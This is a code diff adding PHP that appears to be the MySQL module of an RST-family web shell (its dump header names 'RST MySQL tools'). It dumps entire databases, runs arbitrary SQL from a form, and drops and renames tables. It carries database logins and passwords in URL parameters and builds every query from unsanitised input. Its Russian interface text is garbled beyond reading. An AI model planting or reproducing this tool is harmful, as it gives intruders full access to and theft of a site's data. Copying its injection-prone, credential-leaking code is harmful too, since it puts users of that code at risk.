+"<input type=\"hidden\" name=\"dump\" value=\"bd\">".
+"<input type=\"hidden\" name=\"strukt\" value=\"d_strukt_bd\">".
+"<table align=center bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+"<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+"<tr><td align=center><b>Dump ����</b> [ <font color=green><b>$db</b></font> ]</td></tr>".
+"<tr><td align=center><font color=gray><b>��������� � ������</b></font></td></tr>".
+"<tr><td align=center><hr size=1 color=#FFFFFF><b>��������</b> (��������/���������)</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_br\" checked=\"checked\"> �������� � ��������</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_http\"> ��������� ���� ����� �� HTTP</td></tr>".
+"<tr><td align=center><br><input type=\"submit\" value=\"��������� ������\"></td></tr>".
+"</table>".
+"</td></tr></table></form>";
+
+if ($HTTP_GET_VARS['dump']=='bd') {
+   if ($cnt >= 1) {
+      print $form_dump_bd;
+   }else{ 
+      print "<table border=1 width=400 align=center bgcolor=#E7E7D7><tr align=center>".
+            "<td><br><h5>���������� ������� ���� ����<br>� ���� <font color=blue>".
+            "$db</font> ��� ������!</h5></td></tr></table><br><br>";
+   }
+}
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['send']=='send_br'){
+   if (sizeof($tabs) == 0) { 
+      // �������� ������ ������ ���� 
+      $res = mysql_query("SHOW TABLES FROM $db", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_row($res)) { 
+            $tabs[] .= $row[0]; 
+         } 
+      } 
+   } 
+       // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
+   foreach($tabs as $tab) {       
+      if ($add_drop) { 
+         fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
+      }        
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tab`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+      fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
+   } 
+   fclose($fp);
+   $dump_file=file($file);
+   print "<table border=1 align=center cellpadding=2 bgcolor=#F0F1F4 width=98%><tr><td>";
+   print "<table border=0 align=center cellpadding=2 bgcolor=#F0F1F4>";
+   foreach ($dump_file as $k=>$v) {
+        $v=str_replace("\n","<br>",$v);
+        print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";
+   }
+   print "</table></td></tr></table><br>";
+   unlink($file);
+} 
+
+/*--------------������� ����� �������---------------*/
+ $form_cr_tbl=
+ "<form method=\"get\" action=\"$self\">".
+ "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+ "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+ "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+ "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+ "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+ "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+ "<table align=center bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+ "<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+ "<tr><td align=center><b>������� ����� ������� � ����</b> [ <font color=green><b>$db</b></font> ]<hr color=#FFFFFF></td></tr>".
+ "<tr><td align=center>��� ����� �������: <input type=\"text\" name=\"new_tbl_name\" value=\"\" size=25></td></tr>".
+ "<tr><td align=center>���������� ����� �������:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"text\" name=\"new_count_cols\" value=\"\" size=10></td></tr>".
+ "<tr><td align=center><br><input type=\"submit\" value=\"��������� ������\"></td></tr>".
+ "</table>".
+ "</td></tr></table></form>";
+
+
+if (isset($HTTP_GET_VARS['cr_tbl']) && $HTTP_GET_VARS['cr_tbl']=='new'){
+  print "$form_cr_tbl";   
+}
+if ( (isset($new_count_cols)) && (ereg("[^0-9]",$new_count_cols) || preg_match("/ +/",$new_count_cols) || $new_count_cols=='') ) { 
+    print "<script>alert('���������� ����� ������� - ��� �����, � �� ���-�� ����!');</script>";
+    print "$form_cr_tbl";   
+}  
+
+if ( (ereg("[0-9]",$HTTP_GET_VARS['new_count_cols'])) && ($HTTP_GET_VARS['new_tbl_name'] !=='') ) {
+
+ for ($i=0; $i < $HTTP_GET_VARS['new_count_cols']; $i++) {
+
+  $pole_count .= "<tr align=center bgcolor=#DDDDDD>".
+      "<td><input type=\"text\" name=\"field_name[]\" size=\"10\" value=\"\"></td>".
+      "<td>
+            <select name=\"field_type[]\" width=3>
+                <option value=\"VARCHAR\">VARCHAR</option>
+                <option value=\"TINYINT\">TINYINT</option>
+                <option value=\"TEXT\">TEXT</option>
+                <option value=\"DATE\">DATE</option>
+                <option value=\"SMALLINT\">SMALLINT</option>
+                <option value=\"MEDIUMINT\">MEDIUMINT</option>
+                <option value=\"INT\">INT</option>
+                <option value=\"BIGINT\">BIGINT</option>
+                <option value=\"FLOAT\">FLOAT</option>
+                <option value=\"DOUBLE\">DOUBLE</option>
+                <option value=\"DECIMAL\">DECIMAL</option>
+                <option value=\"DATETIME\">DATETIME</option>
+                <option value=\"TIMESTAMP\">TIMESTAMP</option>
+                <option value=\"TIME\">TIME</option>
+                <option value=\"YEAR\">YEAR</option>
+                <option value=\"CHAR\">CHAR</option>
+                <option value=\"TINYBLOB\">TINYBLOB</option>
+                <option value=\"TINYTEXT\">TINYTEXT</option>
+                <option value=\"BLOB\">BLOB</option>
+                <option value=\"MEDIUMBLOB\">MEDIUMBLOB</option>
+                <option value=\"MEDIUMTEXT\">MEDIUMTEXT</option>
+                <option value=\"LONGBLOB\">LONGBLOB</option>
+                <option value=\"LONGTEXT\">LONGTEXT</option>
+                <option value=\"ENUM\">ENUM</option>
+                <option value=\"SET\">SET</option>
+            </select>
+        </td>".
+      "<td><input type=\"text\" name=\"field_length[]\" size=\"6\" value=\"\"></td>".
+      "<td>
+            <select name=\"field_attribute[]\">    
+                <option value=\"\" selected=\"selected\"></option>
+                <option value=\"BINARY\">BINARY</option>
+                <option value=\"UNSIGNED\">UNSIGNED</option>
+                <option value=\"UNSIGNED ZEROFILL\">UNS-D ZEROFILL</option>
+            </select>
+      </td>".
+      "<td>
+            <select name=\"field_null[]\">   
+                <option value=\"NOT NULL\">not null</option>
+                <option value=\"\">null</option>
+            </select>
+       </td>".
+       "<td><input type=\"text\" name=\"field_default[]\" size=\"14\" value=\"\"></td>".
+       "<td>
+            <select name=\"field_extra[]\">
+                <option value=\"\"></option>
+                <option value=\"AUTO_INCREMENT\">auto_increment</option>
+             </select>
+        </td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"primary_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"index_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"unique_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"no\" checked=\"checked\"></td>".
+      "</tr>";
+ }
+
+  print 
+     "<form method=\"get\" action=\"$self\">".
+     "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+     "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+     "<input type=\"hidden\" name=\"new_tbl_name\" value=\"$new_tbl_name\">".
+     "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+     "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+     "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+     "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+     "<table align=center bgcolor=#FFFFFF width=98% cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+     "<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+     "<tr><td align=center><b>������� ����� �������</b> [ <font color=green><b>$new_tbl_name</b></font> ] <b>� ����</b> [ <font color=green><b>$db</b></font> ]<hr color=#FFFFFF></td></tr>".
+     "<tr><td align=center>".
+     "<table bgcolor=#000000 border=0 cellspacing=1 cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+     "<tr align=center bgcolor=silver><td><b>����</b></td><td><b>���</b></td><td><b>������</b></td><td><b>��������</b></td><td><b>����</b></td><td><b>�� ���������</b></td><td><b>�������������</b></td><td><b>���������</b></td><td><b>������</b></td><td><b>����-o�</b></td><td><b>---</b></td></tr>";
+
+
+            print $pole_count;
+
+
+print
+    "</table><br><b>���������� � �������:</b> <input type=\"text\" name=\"comment\" size=\"40\" maxlength=\"80\">
+     &nbsp;&nbsp;&nbsp;&nbsp;<b>��� �������:</b>
+            <select name=\"tbl_type\">
+                <option value=\"Default\">�� ���������</option>
+                <option value=\"MYISAM\">MyISAM</option>
+                <option value=\"HEAP\">Heap</option>
+                <option value=\"MERGE\">Merge</option>
+                <option value=\"ISAM\">ISAM</option>
+            </select>&nbsp;&nbsp;&nbsp;&nbsp;
+           <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> �������� PHP-��� �������
+    </td></tr>".
+    "<tr><td align=center><br><input type=\"submit\" value=\"��������� ������\"></td></tr>".
+    "</table>".
+    "</td></tr></table></form>";
+}
+
+if (isset($HTTP_GET_VARS['field_name'])) {
+
+    for ($i=0; $i<count($field_name); $i++) {
+       if ($HTTP_GET_VARS['field_name'][$i] !=='') {
+         $n_name .= "`$field_name[$i]` ";
+         if ($HTTP_GET_VARS['field_length'][$i] !=='') {
+             $n_name .= "$field_type[$i]($field_length[$i]) ";
+         }else{
+             $n_name .= "$field_type[$i] ";
+         }
+         if ($HTTP_GET_VARS['field_attribute'][$i] !=='') { $n_name .= "$field_attribute[$i] "; }
+         if ($HTTP_GET_VARS['field_null'][$i] =='NOT NULL') { $n_name .= "$field_null[$i] "; }
+         if ($HTTP_GET_VARS['field_default'][$i] !=='') { $n_name .= "DEFAULT '$field_default[$i]' "; }
+         if ($HTTP_GET_VARS['field_extra'][$i] =='AUTO_INCREMENT') { $n_name .= "$field_extra[$i], "; }else{ $n_name .=', '; }
+
+         /*--------������� primary,index,unique----------*/
+         if ($HTTP_GET_VARS['field_key_0'][$i] !=='no') { 
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='primary_0') {
+                $n_prim .= " `$field_name[$i]`, "; 
+            }
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='index_0') { 
+                $n_ind .= " `$field_name[$i]`, "; 
+            }
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='unique_0') { 
+                $n_uniq .= " `$field_name[$i]`, "; 
+            }
+         }
+         /*--------END primary,index,unique----------*/
+       }
+    }  //end for
+
+    $n_name=substr_replace($n_name,"",-2);                     
+    if (count($n_prim)>0) {
+       $n_prim=substr_replace($n_prim,"",-2); 
+       $n_name .=", PRIMARY KEY ($n_prim)";
+    }
+    if (count($n_ind)) {
+       $n_ind=substr_replace($n_ind,"",-2); 
+       $n_name .=", INDEX ($n_ind)";
+    }
+    if (count($n_uniq)) {
+       $n_uniq=substr_replace($n_uniq,"",-2); 
+       $n_name .=", UNIQUE ($n_uniq)";
+    }
+
+   $sql_new_tbl = "CREATE TABLE `$new_tbl_name` ( $n_name )";
+
+   if ($HTTP_GET_VARS['tbl_type'] !=='Default') {
+      $sql_new_tbl .= " TYPE =$tbl_type";
+   }
+   if ($HTTP_GET_VARS['comment'] !=='') {
+     $sql_new_tbl .= " COMMENT = '$comment'";
+   }       
+
+  $r_n_tbl=mysql_db_query($db, $sql_new_tbl) or die("$h_error".mysql_error()."$f_error");
+  $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>������� [ <b>$new_tbl_name</b> ] ������� �������.</font><br>");
+   if ($HTTP_GET_VARS['php_kod']=='ok') { 
+        $t2=base64_encode("<br><table bgcolor=#EDEEF1 align=center width=98%><font color=green><b>PHP-��� �������:</b></font><tr><td>\$sql='$sql_new_tbl';</td></tr></table><br><br>");
+   }else{ $t2=''; }
+  print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&t=$t&t2=$t2'></head>";
+} 
+
+/*--------------END c������ ����� �������---------------*/
+
+/*-------------������������ ������ � ��-------------*/
+if ($HTTP_GET_VARS['q_tbl']=='bd') { $q_bd="SHOW TABLE STATUS "; }
+if ($HTTP_GET_VARS['return_sql']=='ok') { $q_bd=trim($HTTP_GET_VARS['new_query_bd']);}
+$form_query_db="<br>
+        <form method=\"get\" action=\"$self?s=$s\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <table align=center width=90% border=0 bgcolor=#EDEEF1><tr><td>��������� ������������ ������ � ���� ( <b>$db</b> )</td></tr>
+        <tr><td width=90>
+        <textarea name=\"new_query_bd\" rows=\"10\" cols=\"80\">$q_bd</textarea>
+        </td><td valign=top>
+        <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> �������� PHP-��� �������<br><br>
+        <input type=\"checkbox\" name=\"return_sql\" value=\"ok\" checked=\"checked\"> �������� ������ ������ �����<br>
+        <br>
+        <a href=\"$self?s=$s&q_help=ok\" target=\"_blank\"><b>������� ��������</b></a>
+        </td></tr>
+        <tr><td>
+        <input type=\"submit\" value=\"������\">
+        </td></tr>
+        </table></form>";
+
+if (isset($db) && $HTTP_GET_VARS['q_tbl']=='bd') { 
+  print $form_query_db; 
+}
+if (isset($new_query_bd)) { 
+   $new_query_bd=trim($new_query_bd);
+   print $form_query_db;
+   if ($HTTP_GET_VARS['php_kod']=='ok') { 
+        print "&nbsp;&nbsp;&nbsp;<font color=green><b>PHP-��� �������:</b></font><br>&nbsp;&nbsp;&nbsp;\$sql=\"$new_query_bd\";<br><br>";
+   }
+  $r_q_bd=mysql_db_query($db, $new_query_bd) or die("$h_error".mysql_error()."$f_error");
+
+  print "&nbsp;&nbsp;&nbsp;<b>������ ������� ��������<b>";
+  if ($r_q_bd !=='') {
+    print "<table align=center width=98% bgcolor=#D7D8DA>";
+    while ($line_bd = @mysql_fetch_array($r_q_bd, MYSQL_ASSOC)) {
+        print "<tr>";
+        foreach ($line_bd as $key_bd =>$col_value_bd) {          
+            print "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value_bd)."</td>";
+        }
+        print "</tr>";
+    }
+    print "</table><br>";
+    @mysql_free_result($r_q_bd);
+  }
+} 
+
+/*---------------�������� �������------------*/
+if (isset($drop_table) && isset($db)){ 
+ mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+ $query = "DROP TABLE IF EXISTS $drop_table";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>������� [ <b>$drop_table </b>] ������� �������.</font><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&t=$t'></head>";
+ unset($drop_table);
+}
+if (isset($q_i)) { $n_img($tag,$f_n,$img_c); }
+
+if (isset($db) && isset($tbl)) {
+ /*�������� ���������� ����� � �������*/
+ $count=mysql_query ("SELECT COUNT(*) FROM $tbl");
+ $count_row= mysql_fetch_array($count);  //$count_row[0] ���-�� �����
+ mysql_free_result($count);
+ print "<table border=0 align=center width=100% cellpadding=0 cellspacing=0>
+         <tr> 
+           <td>
+                <table align=center border=0 width=700 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+                   <tr align=center>                      
+                      <td width=100 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&st_tab=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"�������� ��������� $tbl\"><b>���������</b></a>
+                      </td>
+                      <td width=100 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&login=$login&passwd=$passwd&server=$server&port=$port&nn_row=ok\" title=\"�������� ����� ��� � ������� $tbl\"><b>��������</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&login=$login&passwd=$passwd&server=$server&port=$port&query_tbl&q_tbl=table\" title=\"������������ SQL ������\"><b>SQL-������</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl&dump=tab\" title=\"������� ������ ������� $tbl\"><b>���� �������</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl&alter_table=TRUE\" title=\"������������� ������� $tbl\"><b>�������������</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&drop_table=$tbl&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"������� ������� $tbl\" onClick=\"return confirm('������� ������� $tbl ?')\";><b>������� �������</b></a>
+                     </td>
+                   </tr>
+                </table> 
+           </td>
+         </tr>
+         <tr>
+           <td><br>";
+                if (isset($t)) { print "&nbsp;&nbsp;".base64_decode($t);}
+                print "&nbsp;&nbsp;��:(<b>$db</b>)&nbsp;&nbsp;&nbsp;&nbsp;�������:(<b>$tbl</b>)&nbsp;&nbsp;&nbsp;
+                ����� �����:(<b>$count_row[0]</b>)
+           </td>
+         </tr>
+         <tr>
+           <td> 
+<table border=0 width=100% cellpadding=4 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#E6E7E9 align=center valign=center>";
+
+$start=$limit_start+$limit_count;
+
+if (isset($start) && ($start>0)) {
+ print "<table align=center border=0 cellpadding=4 cellspacing=0>
+        <tr>";
+       
+if ($start+$limit_count >= $count_row[0]){
+$start=$limit_start;
+$limit_count=$count_row[0]-$start;
+}
+
+if (isset($start) && ($limit_start >= 30) ){
+  $back=$limit_start-30;
+  print "<form method=\"get\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>       
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"limit_start\" value=\"$back\">
+        <input type=\"hidden\" name=\"limit_count\" value=\"30\">
+        <input type=\"submit\" value=\"<< �����(30)\">&nbsp;&nbsp;
+        </td></form>";
+}
+
+print " <form method=\"get\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"submit\" value=\"��������\">&nbsp;&nbsp;��
+        <input type=\"text\" name=\"limit_start\" value=\"$start\" size=\"5\" maxlength=\"5\">������
+        &nbsp;&nbsp; <input type=\"text\" name=\"limit_count\" value=\"$limit_count\" size=\"5\" maxlength=\"5\">����� �������
+        </td></form>";
+
+if ( isset($limit_start) && ($start <= $count_row[0]) ){
+ print "<form method=\"get\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"limit_start\" value=\"$start\">
+        <input type=\"hidden\" name=\"limit_count\" value=\"30\">
+        <input type=\"submit\" value=\"������(30)>>\">
+        </td></form>";
+}
+
+print "</tr></form></table>";
+}
+
+
+/*------------�������������� �������------------*/
+if ($alter_table=="TRUE"){
+print " <form method=\"get\" action=\"$self\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"alter_table\" value=\"$alter_table\">
+        <table border=0 cellpadding=4 cellspacing=1 bgcolor=#FFFFFF>
+        <tr><td bgcolor=#DAD9D9 align=center><font size=2>������������� ������� [ <b>$tbl</b> ]</font></td></tr>
+        <tr><td bgcolor=#DAD9D9>����� ��� �������:
+        <input type=\"text\" name=\"alttbl\" value=\"\">
+        <input type=\"submit\" value=\"�������������\" onClick=\"return confirm('�� �������, ��� ������ ������������� ������� \' $tbl \' ?')\";>
+        </td></tr></table></form>";
+}
+
+ if (isset($alttbl)){
+ mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ //$query = "RENAME TABLE $tbl TO $alttbl";
+ $query = "ALTER TABLE $tbl RENAME TO $alttbl";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+ $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>������� [ <b>$tbl ]</b> ������������� � [ <b>$alttbl</b> ]</font><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&tbl=$alttbl&limit_start=0&limit_count=5&t=$t'></head>";
+ }
+
+/*-------------------��������� �������-----------------*/
+if (isset($st_tab) && $st_tab=='TRUE'){
+ mysql_select_db($st_db);
+ $result = mysql_query('desc '.$tbl, $connection); 
+ print "<br><center><font size=2>��������� ������� [ <b>$tbl</b> ]</font><center>".
+       "<table align=center border=0 cellpadding=2 cellspacing=1 width=700 bgcolor=#FFFFFF>";
+ 
+ for ($i=0;$i<@mysql_num_fields($result);$i++){
+       $name=mysql_field_name($result,$i);
+       $name=eregi_replace("Field","����",trim($name));
+       $name=eregi_replace("Type","���",trim($name));
+       $name=eregi_replace("Null","����",trim($name));
+       $name=eregi_replace("Key","�������",trim($name));
+       $name=eregi_replace("Default","�� ���������",trim($name));
+       $name=eregi_replace("Extra","�������������",trim($name));
+       $nn .= "<td align=center bgcolor=#C7C5C5><b>$name</b></td>";   
+ } 
+ print "<tr>$nn</tr>";
+ while ($l_tbl = @mysql_fetch_array($result, MYSQL_ASSOC)) {      
+     print "<tr bgcolor=#E7E7D7>";
+     foreach ($l_tbl as $k_tbl =>$col_v_tbl) {          
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'PRI') {
+             $col_v_tbl="���������";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'UNI') {
+             $col_v_tbl="����������";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'MUL' && $col_v_tbl !=='') {
+             $col_v_tbl="������";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'YES') { $col_v_tbl="��"; }
+          if (eregi("Field", $k_tbl)) { 
+             print "<td><font color=green><b>".htmlspecialchars($col_v_tbl)."</b></font></td>";
+          }elseif (eregi("Type", $k_tbl)) { 
+             print "<td align=left>".htmlspecialchars($col_v_tbl)."</td>";
+          }else{
+             print "<td align=center>".htmlspecialchars($col_v_tbl)."</td>";             
+          }
+     }
+     print "</tr>";
+ }
+ print "</table><br>";
+ @mysql_free_result($result);
+}
+
+/*-------------������������ ������ � �������-------------*/
+if ($HTTP_GET_VARS['q_tbl']=='table') { $q_tbl="SELECT * FROM `$tbl` WHERE 1 LIMIT 0, 30"; }
+if ($HTTP_GET_VARS['return_sql']=='ok') { $q_tbl=trim($HTTP_GET_VARS['new_query_tbl']); }
+$form_query_db_tbl="<br>
+        <form method=\"get\" action=\"$self?s=$s\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <table width=90% border=0 bgcolor=#EDEEF1><tr><td>��������� ������������ ������ � ������� ( <b>$tbl</b> )</td></tr>
+        <tr><td width=90>
+        <textarea name=\"new_query_tbl\" rows=\"10\" cols=\"80\">$q_tbl</textarea>
+        </td><td valign=top>
+        <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> �������� PHP-��� �������<br><br>
+        <input type=\"checkbox\" name=\"return_sql\" value=\"ok\" checked=\"checked\"> �������� ������ ������ �����<br>
+        <br>
+        <a href=\"$self?s=$s&q_help=ok\" target=\"_blank\"><b>������� ��������</b></a>
+        </td></tr>
+        <tr><td>
+        <input type=\"submit\" value=\"������\">
+        </td></tr>
+        </table></td></form>";
+
+
+if (isset($HTTP_GET_VARS['query_tbl']) || $HTTP_GET_VARS['q_tbl']=='table') { 
+  print $form_query_db_tbl."<br>"; 
+}
+
+
+if (isset($new_query_tbl)) {
+   $new_query_tbl=trim($new_query_tbl);
+   print $form_query_db_tbl;
+
+
+   $result_tbl = mysql_query($new_query_tbl) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   if ($result_tbl !=='') {
+      print " 
+      <table align=center border=0 width=90% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr>";
+      if ($php_kod=='ok') { print "<font color=green><b>PHP-��� �������:</b></font><br>\$sql = \"$new_query_tbl\";<br><br>"; }
+      if (preg_match("[drop]",$new_query)) { print "������� �������, �������� ������ ������ ����."; }
+
+      print "<br><b>������ ������� ��������</b><br>";
+      /*�������� �������� ��������*/
+      for ($i=0;$i<@mysql_num_fields($result_tbl);$i++){
+           $name_tbl=mysql_field_name($result_tbl,$i);
+           print "<td bgcolor=#C7C5C5>$name_tbl</td>";   
+      } 
+
+      print "</tr>";
+      while ($line_tbl = @mysql_fetch_array($result_tbl, MYSQL_ASSOC)) {
+         print "<tr>";
+         foreach ($line_tbl as $key_tbl =>$col_value_tbl) {          
+             print "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value_tbl)."</td>";
+         }
+         print "</tr>";
+      }
+      print "</table><br>";
+      @mysql_free_result($result_tbl);
+   }
+}
+
+/*-------------�������� ������ �������--------------*/
+if (!isset($alter_table) && !isset($st_tab) && !isset($query_tbl) && !isset($new_query_tbl) && 
+!isset($dump) && !isset($strukt) && !isset($query_edit) && !isset($query_del) && !isset($q_get) && 
+!isset($nn_row) && !isset($nn) && !isset($upd_f)) {
+  print "<br><table border=0 cellpadding=1 cellspacing=1 width=100% bgcolor=#FFFFFF><tr>";
+
+//���������� ������ ��� �������, �� ������ ����(�����) ����� ������ ������������� ������
+//Key_name ��� �������, Column_name ��� �������
+$query_ind = 'SHOW KEYS FROM '.$tbl;
+$result_ind = mysql_query($query_ind) or die("$h_error<b>".mysql_error()."</b>$f_error");
+
+while ($row = mysql_fetch_array($result_ind, MYSQL_ASSOC)) {
+    if ($row['Key_name'] == 'PRIMARY') {
+        $primary[] .= $row['Column_name'];
+    } 
+}
+ 
+mysql_free_result($result_ind);
+
+ $query = "SELECT * FROM $tbl LIMIT $limit_start,$limit_count";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+if (mysql_num_rows($result) == 0) {
+  print "������� <b>$tbl</b> �� �������� �� ����� ������";
+}else{
+  /*�������� �������� ��������*/
